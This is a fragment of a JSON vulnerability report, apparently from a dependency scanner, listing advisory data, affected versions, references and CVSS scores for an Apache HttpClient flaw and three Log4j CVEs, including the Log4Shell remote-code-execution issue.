-2020-13956","cwe":{"id":"79","name":"Improper Neutralization of Input During Web Page Generation"},"discovery_date":"2021-06-03T23:40:23","ids":[{"system_name":"CVE 
Record","text":"CVE-2020-13956"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0002"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Cross-site scripting in Apache HttpClient"},{"category":"details","details":"Vulnerability Details","text":"# Cross-site scripting in Apache HttpClient Apache HttpClient versions prior to version 4.5.13 and 5.0.3 can misinterpret malformed authority component in request URIs passed to the library as java.net.URI object and pick the wrong target host for request execution."}],"product_status":{"known_affected":["org.apache.httpcomponents/httpclient@vers:maven/>=4.0-alpha1|<=4.5.12"],"known_not_affected":["org.apache.httpcomponents/httpclient@4.5.13"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r03bbc318c81be21f5c8a9b85e34f2ecc741aa804a8e43b0ef2c37749@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r043a75acdeb52b15dd5e9524cdadef4202e6a5228644206acf9363f9@%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r06cf3ca5c8ceb94b39cd24a73d4e96153b485a7dac88444dd876accb@%3Cissues.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0a75b8f0f72f3e18442dc56d33f3827b905f2fe5b7ba48997436f5d1@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0bebe6f9808ac7bdf572873b4fa96a29c6398c90dab29f131f3ebffe@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r12cb62751b35bdcda0ae2a08b67877d665a1f4d41eee0fa7367169e0@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r132e4c6a560cfc519caa1aaee63bdd4036327610eadbd89f76dd5457@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2835543ef0f91adcc47da72389b816e36936f584c7be584d2314fac3@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2a03dc210231d7e852ef73015f71792ac0fcaca6cccc024c522ef17d@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2dc7930b43eadc78220d269b79e13ecd387e4bee52db67b2f47d4303@%3Cgitbox.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r34178ab6ef106bc940665fd3f4ba5026fac3603b3fa2aefafa0b619d@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r34efec51cb817397ccf9f86e25a75676d435ba5f83ee7b2eabdad707@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3cecd59fba74404cbf4eb430135e1080897fb376f111406a78bed13a@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3f740e4c38bba1face49078aa5cbeeb558c27be601cc9712ad2dcd1e@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4850b3fbaea02fde2886e461005e4af8d37c80a48b3ce2a6edca0e30@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r549ac8c159bf0c568c19670bedeb8d7c0074beded951d34b1c1d0d05@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r55b2a1d1e9b1ec9db792b93da8f0f99a4fd5a5310b02673359d9b4d1@%3Cdev.drill.apache.org%3E"},{"summary":"Apache 
Mailing List","url":"https://lists.apache.org/thread.html/r5b55f65c123a7481104d663a915ec45a0d103e6aaa03f42ed1c07a89@%3Cdev.jackrabbit.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5de3d3808e7b5028df966e45115e006456c4e8931dc1e29036f17927@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5fec9c1d67f928179adf484b01e7becd7c0a6fdfe3a08f92ea743b90@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r63296c45d5d84447babaf39bd1487329d8a80d8d563e67a4b6f3d8a7@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r69a94e2f302d1b778bdfefe90fcb4b8c50b226438c3c8c1d0de85a19@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6a3cda38d050ebe13c1bc9a28d0a8ec38945095d07eca49046bcb89f@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6d672b46622842e565e00f6ef6bef83eb55d8792aac2bee75bff9a2a@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6dab7da30f8bf075f79ee189e33b45a197502e2676481bb8787fc0d7%40%3Cdev.hc.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6eb2dae157dbc9af1f30d1f64e9c60d4ebef618f3dce4a0e32d6ea4d@%3Ccommits.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r70c429923100c5a4fae8e5bc71c8a2d39af3de4888f50a0ac3755e6f@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r87ddc09295c27f25471269ad0a79433a91224045988b88f0413a97ec@%3Cissues.bookkeeper.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r8aa1e5c343b89aec5b69961471950e862f15246cb6392910161c389b@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9e52a6c72c8365000ecd035e48cc9fee5a677a150350d4420c46443d@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra539f20ef0fb0c27ee39945b5f56bf162e5c13d1c60f7344dab8de3b@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra8bc6b61c5df301a6fe5a716315528ecd17ccb8a7f907e24a47a1a5e@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rad6222134183046f3928f733bf680919e0c390739bfbfe6c90049673@%3Cissues.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rae14ae25ff4a60251e3ba2629c082c5ba3851dfd4d21218b99b56652@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb33212dab7beccaf1ffef9b88610047c644f644c7a0ebdc44d77e381@%3Ccommits.turbine.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb4ba262d6f08ab9cf8b1ebbcd9b00b0368ffe90dad7ad7918b4b56fc@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb725052404fabffbe093c83b2c46f3f87e12c3193a82379afbc529f8@%3Csolr-user.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc0863892ccfd9fd0d0ae10091f24ee769fb39b8957fe4ebabfc11f17@%3Cdev.jackrabbit.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc3739e0ad4bcf1888c6925233bfc37dd71156bbc8416604833095c42@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc505fee574fe8d18f9b0c655a4d120b0ae21bb6a73b96003e1d9be35@%3Cissues.solr.apache.org%3E"},{"summary":"Apache 
Mailing List","url":"https://lists.apache.org/thread.html/rc5c6ccb86d2afe46bbd4b71573f0448dc1f87bbcd5a0d8c7f8f904b2@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc990e2462ec32b09523deafb2c73606208599e196fa2d7f50bdbc587@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcced7ed3237c29cd19c1e9bf465d0038b8b2e967b99fc283db7ca553@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcd9ad5dda60c82ab0d0c9bd3e9cb1dc740804451fc20c7f451ef5cc4@%3Cgitbox.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5ab56beb2ac6879f6ab427bc4e5f7691aed8362d17b713f61779858@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re504acd4d63b8df2a7353658f45c9a3137e5f80e41cf7de50058b2c1@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rea3dbf633dde5008d38bf6600a3738b9216e733e03f9ff7becf79625@%3Cissues.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ree942561f4620313c75982a4e5f3b74fe6f7062b073210779648eec2@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/reef569c2419705754a3acf42b5f19b2a158153cef0e448158bc54917@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf03228972e56cb4a03e6d9558188c2938078cf3ceb23a3fead87c9ca@%3Cissues.bookkeeper.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rf43d17ed0d1fb4fb79036b582810ef60b18b1ef3add0d5dea825af1e@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf4db88c22e1be9eb60c7dc623d0528642c045fb196a24774ac2fa3a3@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf7ca60f78f05b772cc07d27e31bcd112f9910a05caf9095e38ee150f@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfb35f6db9ba1f1e061b63769a4eff5abadcc254ebfefc280e5a0dcf1@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfbedcb586a1e7dfce87ee03c720e583fc2ceeafa05f35c542cecc624@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfc00884c7b7ca878297bffe45fcb742c362b00b26ba37070706d44c3@%3Cissues.hive.apache.org%3E"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13956"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13956"},{"summary":"NetApp Advisory ntap-20220210-0002","url":"https://security.netapp.com/advisory/ntap-20220210-0002"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","version":"3.1"},"products":["org.apache.httpcomponents/httpclient@vers:maven/>=4.0-alpha1|<=4.5.12"]}],"title":"CVE-2020-13956/pkg:maven/org.apache.httpcomponents/httpclient@4.5.12?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-45046"]}],"cve":"CVE-2021-45046","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-14T18:01:28","ids":[{"system_name":"Cert Advisory","text":"930724"},{"system_name":"CVE Record","text":"CVE-2021-45046"},{"system_name":"GitHub Advisory","text":"GHSA-jfh8-c2jp-5v3q"},{"system_name":"Sonicwall Advisory","text":"SNWLID-2021-0032"},{"system_name":"Oracle Advisory","text":"alert-cve-2021-44228"},{"system_name":"Cisco Advisory","text":"cisco-sa-apache-log4j-qRuKNEbd"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5022"},{"system_name":"Gentoo Advisory","text":"glsa-202310-16"},{"system_name":"Intel Advisory","text":"intel-sa-00646"},{"system_name":"Apache Advisory","text":"security"},{"system_name":"Siemens 
Advisory","text":"ssa-397453"},{"system_name":"Siemens Advisory","text":"ssa-479842"},{"system_name":"Siemens Advisory","text":"ssa-661247"},{"system_name":"Siemens Advisory","text":"ssa-714170"}],"notes":[{"audience":"developers","category":"other","text":"Improper Neutralization of Special Elements used in an Expression Language Statement","title":"Additional CWE: 917"},{"category":"description","details":"Vulnerability Description","text":"Incomplete fix for Apache Log4j vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Incomplete fix for Apache Log4j vulnerability # Impact The fix to address [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a remote code execution (RCE) attack. ## Affected packages Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use. # Mitigation Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. This issue can be mitigated in prior releases (< 2.16.0) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. 
Note that previous mitigations involving configuration such as to set the system property `log4j2.formatMsgNoLookups` to `true` do NOT mitigate this specific vulnerability."}],"product_status":{"known_affected":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.0-alpha1|<=2.12.1"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/14/4"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/15/3"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/18/1"},{"summary":"Siemens Advisory ssa-397453","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"},{"summary":"Siemens Advisory ssa-479842","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"},{"summary":"Siemens Advisory ssa-661247","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"},{"summary":"Siemens Advisory ssa-714170","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"},{"summary":"GitHub Advisory GHSA-jfh8-c2jp-5v3q","url":"https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ"},{"summary":"Apache Advisory security","url":"https://logging.apache.org/log4j/2.x/security.html"},{"summary":"Cve 
2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-45046"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-45046"},{"summary":"Sonicwall Advisory SNWLID-2021-0032","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"},{"summary":"Gentoo Advisory glsa-202310-16","url":"https://security.gentoo.org/glsa/202310-16"},{"summary":"Cisco Advisory cisco-sa-apache-log4j-qRuKNEbd","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"},{"summary":"Cve 2021","url":"https://www.cve.org/CVERecord?id=CVE-2021-44228"},{"summary":"Debian Advisory dsa-5022","url":"https://www.debian.org/security/2021/dsa-5022"},{"summary":"Intel Advisory intel-sa-00646","url":"https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"},{"summary":"Cert Advisory 930724","url":"https://www.kb.cert.org/vuls/id/930724"},{"summary":"Openwall Mailing List","url":"https://www.openwall.com/lists/oss-security/2021/12/14/4"},{"summary":"Oracle Advisory alert-cve-2021-44228","url":"https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory 
cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.0,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.1,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":9.0,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.0-alpha1|<=2.12.1"]}],"title":"CVE-2021-45046/pkg:maven/org.apache.logging.log4j/log4j-core@2.9.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-44832"]}],"cve":"CVE-2021-44832","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-01-04T16:14:20","ids":[{"system_name":"CVE Record","text":"CVE-2021-44832"},{"system_name":"Apache Advisory","text":"LOG4J2-3293"},{"system_name":"Cisco Advisory","text":"cisco-sa-apache-log4j-qRuKNEbd"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"NetApp Advisory","text":"ntap-20220104-0001"},{"system_name":"Siemens Advisory","text":"ssa-784507"}],"notes":[{"audience":"developers","category":"other","text":"Improper Neutralization of Special Elements in Output Used by a Downstream Component","title":"Additional CWE: 74"},{"category":"description","details":"Vulnerability Description","text":"Improper Input Validation and Injection in Apache 
Log4j2"},{"category":"details","details":"Vulnerability Details","text":"# Improper Input Validation and Injection in Apache Log4j2 Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to an attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2. # Affected packages Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use. This issue does not impact default configurations of Log4j2 and requires an attacker to have control over the Log4j2 configuration, which reduces the likelihood of being exploited."}],"product_status":{"known_affected":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4|<2.12.4"],"known_not_affected":["org.apache.logging.log4j/log4j-core@2.12.4"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/28/1"},{"summary":"Siemens Advisory ssa-784507","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-784507.pdf"},{"summary":"Apache Advisory LOG4J2-3293","url":"https://issues.apache.org/jira/browse/LOG4J2-3293"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/s1o5vlo78ypqxnzn6p8zf6t9shtq5143"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/12/msg00036.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EVV25FXL4FU5X6X5BSL7RLQ7T6F65MRA"},{"summary":"Fedora Project Mailing 
List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T57MPJUW3MA6QGWZRTMCHHMMPQNVKGFC"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-44832"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-44832"},{"summary":"NetApp Advisory ntap-20220104-0001","url":"https://security.netapp.com/advisory/ntap-20220104-0001"},{"summary":"Cisco Advisory cisco-sa-apache-log4j-qRuKNEbd","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.6,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":6.6,"environmentalSeverity":"MEDIUM","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"HIGH","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"HIGH","scope":"UNCHANGED","temporalScore":6.6,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4|<2.12.4"]}],"title":"CVE-2021-44832/pkg:maven/org.apache.logging.log4j/log4j-core@2.9.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-44228"]}],"cve":"CVE-2021-44228","cwe":{"id":"20","name":"Improper Input 
Validation"},"discovery_date":"2021-12-10T00:40:56","ids":[{"system_name":"Twitter Advisory","text":"1469345530182455296"},{"system_name":"Cert Advisory","text":"930724"},{"system_name":"CVE Record","text":"CVE-2021-44228"},{"system_name":"GitHub Advisory","text":"GHSA-7rjr-3q55-vv33"},{"system_name":"Apple Advisory","text":"HT213189"},{"system_name":"Apache Advisory","text":"LOG4J2-3198"},{"system_name":"Apache Advisory","text":"LOG4J2-3201"},{"system_name":"Apache Advisory","text":"LOG4J2-3214"},{"system_name":"Apache Advisory","text":"LOG4J2-3221"},{"system_name":"Sonicwall Advisory","text":"SNWLID-2021-0032"},{"system_name":"Oracle Advisory","text":"alert-cve-2021-44228"},{"system_name":"Bentley Advisory","text":"be-2022-0001"},{"system_name":"Apache Advisory","text":"changes-report"},{"system_name":"Cisco Advisory","text":"cisco-sa-apache-log4j-qRuKNEbd"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Debian Advisory","text":"dsa-5020"},{"system_name":"Intel Advisory","text":"intel-sa-00646"},{"system_name":"Apache Advisory","text":"lookups"},{"system_name":"Microsoft Advisory","text":"microsofts-response-to-cve-2021-44228-apache-log4j2"},{"system_name":"Apache Advisory","text":"migration"},{"system_name":"NetApp Advisory","text":"ntap-20211210-0007"},{"system_name":"Apache Advisory","text":"security"},{"system_name":"Siemens Advisory","text":"ssa-397453"},{"system_name":"Siemens Advisory","text":"ssa-479842"},{"system_name":"Siemens Advisory","text":"ssa-661247"},{"system_name":"Siemens Advisory","text":"ssa-714170"}],"notes":[{"audience":"developers","category":"other","text":"Uncontrolled Resource Consumption","title":"Additional CWE: 400"},{"audience":"developers","category":"other","text":"Deserialization of Untrusted Data","title":"Additional CWE: 502"},{"audience":"developers","category":"other","text":"Improper Neutralization of Special Elements used in an Expression Language 
Statement","title":"Additional CWE: 917"},{"category":"description","details":"Vulnerability Description","text":"Remote code injection in Log4j"},{"category":"details","details":"Vulnerability Details","text":"# Remote code injection in Log4j # Summary Log4j versions prior to 2.16.0 are subject to a remote code execution vulnerability via the ldap JNDI parser. As per [Apache's Log4j security guide](https://logging.apache.org/log4j/2.x/security.html): Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.16.0, this behavior has been disabled by default. Log4j version 2.15.0 contained an earlier fix for the vulnerability, but that patch did not disable attacker-controlled JNDI lookups in all situations. For more information, see the `Updated advice for version 2.16.0` section of this advisory. # Impact Logging untrusted or user controlled data with a vulnerable version of Log4J may result in Remote Code Execution (RCE) against your application. This includes untrusted data included in logged errors such as exception traces, authentication failures, and other unexpected vectors of user controlled input. # Affected versions Any Log4J version prior to v2.15.0 is affected to this specific issue. The v1 branch of Log4J which is considered End Of Life (EOL) is vulnerable to other RCE vectors so the recommendation is to still update to 2.16.0 where possible. ## Security releases Additional backports of this fix have been made available in versions 2.3.1, 2.12.2, and 2.12.3 ## Affected packages Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. 
The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use. # Remediation Advice ## Updated advice for version 2.16.0 The Apache Logging Services team provided updated mitigation advice upon the release of version 2.16.0, which [disables JNDI by default and completely removes support for message lookups](https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0). Even in version 2.15.0, lookups used in layouts to provide specific pieces of context information will still recursively resolve, possibly triggering JNDI lookups. This problem is being tracked as [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046). More information is available on the [GitHub Security Advisory for CVE-2021-45046](https://github.com/advisories/GHSA-7rjr-3q55-vv33). Users who want to avoid attacker-controlled JNDI lookups but cannot upgrade to 2.16.0 must [ensure that no such lookups resolve to attacker-provided data and ensure that the the JndiLookup class is not loaded](https://issues.apache.org/jira/browse/LOG4J2-3221). Please note that Log4J v1 is End Of Life (EOL) and will not receive patches for this issue. 
